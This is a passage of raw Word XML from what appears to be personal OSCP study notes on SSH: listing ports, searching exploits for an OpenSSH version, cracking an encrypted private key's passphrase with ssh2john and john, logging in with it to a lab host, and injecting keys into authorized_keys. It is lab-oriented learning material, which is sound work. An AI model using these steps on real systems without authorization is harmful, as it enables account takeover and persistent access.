          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Might take a couple of minutes</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b w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Look at Listening ports:</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t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ss -tl</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to List Listening Ports</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C17">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="899"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ss: A tool to display detailed socket statistics (replacement for the older netstat).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C18">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="899"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-t: Shows TCP sockets.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="899"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-l: Filters to display only listening sockets (ports waiting for incoming connections).</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t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ss -tln </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">if you want all the port numbers since "-n" means don't resolve port numbers to service names (like don't convert 22 to SSH)</w:t>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rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Local Address:Port</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C1E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1262"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">0.0.0.0 means that the service is accessible from any IP address</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C1F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1262"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">127.0.0.1 means that the service is accessible only from the local machine (which is the machine you are currently SSH into)</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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_s73cxcoaw9qp" w:id="103"/>
      <w:bookmarkEnd w:id="103"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Finding SSH version exploits</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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2133600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="185" name="image177.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image177.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="826"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here, you would search up "OpenSSH 8.9p1 Ubuntu 3 exploit" and see what shows up</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C25">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="826"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from OSCP 27.1.2. WEBSRV1</w:t>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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_3nv3kfjh1413" w:id="104"/>
      <w:bookmarkEnd w:id="104"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to find Linux version (of target machine) based on SSH version info</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C28">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you see something like "OpenSSH 8.9p1 Ubuntu 3" as shown in the picture above in the previous section, then search it up.</w:t>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t xml:space="preserve">The results contain a link to the Ubuntu Launchpad web page, which contains a list of OpenSSH version information mapped to specific</w:t>
      </w:r>
      <w:hyperlink r:id="rId253">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId254">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Ubuntu releases</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. In our example, the version is mapped to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Jammy Jellyfish</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which is the version name for Ubuntu 22.04.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C2B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_koitt1f6zrf7" w:id="105"/>
      <w:bookmarkEnd w:id="105"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Decrypting SSH Key</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C2C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As seen in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId255">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">EvilBox-One</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play, sometimes the SSH Private Key we get will be encrypted, like in the screenshot below. So that means that when you try and use the SSH key, you will be prompted for a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">passphrase</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. We can use use ssh2john in order to crack the passphrase:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C2D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1447800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="288" name="image285.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image285.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId256"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="144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The name of the file containing private key is id_rsa</w:t>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color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh2john id_rsa &gt; key.hash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C32">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat key.hash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C33">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">john key.hash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C34">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1470"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This will tell you the passphrase of the </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C35">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C36">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh -i id_rsa mowree@192.168.1.21</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C37">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="418"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Log into SSH using the "-i" flag with the private key, and then when prompted, copy and paste the passphrase in order to use the private key</w:t>
        <w:br w:type="textWrapping"/>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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_qyg9acb7v6hn" w:id="106"/>
      <w:bookmarkEnd w:id="106"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Public and Private keys</w:t>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t xml:space="preserve">In SSH,</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> id_rsa </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is your private key, while </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">id_rsa.pub</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is its corresponding public key</w:t>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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_y4fxs368ef7e" w:id="107"/>
      <w:bookmarkEnd w:id="107"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to turn on SSH if it's not on (how to open SSH)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C40">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Never tested this since SSH is usually always open on Linux machines</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C41">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="829"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Check if it's installed </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C42">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="829"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">dpkg -l | grep openssh-server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C43">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="829"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Install it if needed:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C44">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="829"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo apt update &amp;&amp; sudo apt install -y openssh-server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C45">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="829"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Enable SSH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="829"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo systemctl enable ssh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="829"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Turn it on</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C48">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="829"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo systemctl start ssh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C49">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="829"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Check status</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C4A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="829"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo systemctl status ssh</w:t>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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_m0qjundbomkr" w:id="108"/>
      <w:bookmarkEnd w:id="108"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH public key injection attack via authorized_keys file</w:t>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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Regular Users: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Located in ~/.ssh/authorized_keys</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C50">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Root:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Located in /root/.ssh/authorized_keys</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C51">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C52">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Permissions should be 600 for files in authorized_keys and the .ssh directory itself should be 700</w:t>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rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As seen in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Amaterasu PG play</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C55">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000C56">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Also used in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId257">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Roquefort</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
